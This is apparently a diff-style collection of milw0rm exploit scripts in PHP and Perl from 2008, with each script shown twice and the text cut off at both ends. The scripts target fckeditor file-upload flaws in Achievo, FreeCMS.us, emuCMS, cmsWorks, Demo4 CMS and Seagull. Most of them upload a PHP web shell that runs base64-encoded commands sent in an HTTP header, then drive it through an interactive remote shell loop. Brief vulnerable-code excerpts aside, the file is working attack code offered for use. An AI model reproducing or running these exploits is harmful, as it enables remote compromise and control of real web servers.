print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nachievo-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-09]
<?php
/*
-----------------------------------------------------------------
Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.achievo.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nachievo-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-09]

View file

@ -1,73 +1,73 @@
<?php
/*
--------------------------------------------------------------
FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
By : Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-17]
<?php
/*
--------------------------------------------------------------
FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
By : Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-17]

View file

@ -1,29 +1,29 @@
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# t0pP8uZz
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-06-23]
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# t0pP8uZz
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-06-23]

View file

@ -1,112 +1,112 @@
<?php
/*
-----------------------------------------------------------------
cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
discovered by Stack
exploited by ..: EgiX
special thnx to EgiX
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]
<?php
/*
-----------------------------------------------------------------
cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
discovered by Stack
exploited by ..: EgiX
special thnx to EgiX
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]

View file

@ -1,136 +1,136 @@
<?php
/*
--------------------------------------------------------------
Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
--------------------------------------------------------------
by Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]
<?php
/*
--------------------------------------------------------------
Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
--------------------------------------------------------------
by Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]

View file

@ -1,117 +1,117 @@
<?php
/*
------------------------------------------------------------------------
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://seagullproject.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
33. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
34. $Config['Enabled'] = true ;
35.
36. // Path to user files relative to the document root.
37. $Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
38.
39. // Fill the following value it you prefer to specify the absolute path for the
40. // user files directory. Usefull if you are using a virtual directory, symbolic
41. // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
42. // Attention: The above 'UserFilesPath' must point to the same directory.
43. $Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
44.
45. $Config['AllowedExtensions']['File'] = array() ;
46. $Config['DeniedExtensions']['File'] = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
47.
48. $Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
49. $Config['DeniedExtensions']['Image'] = array() ;
50.
51. $Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
52. $Config['DeniedExtensions']['Flash'] = array() ;
53.
54. $Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
55. $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
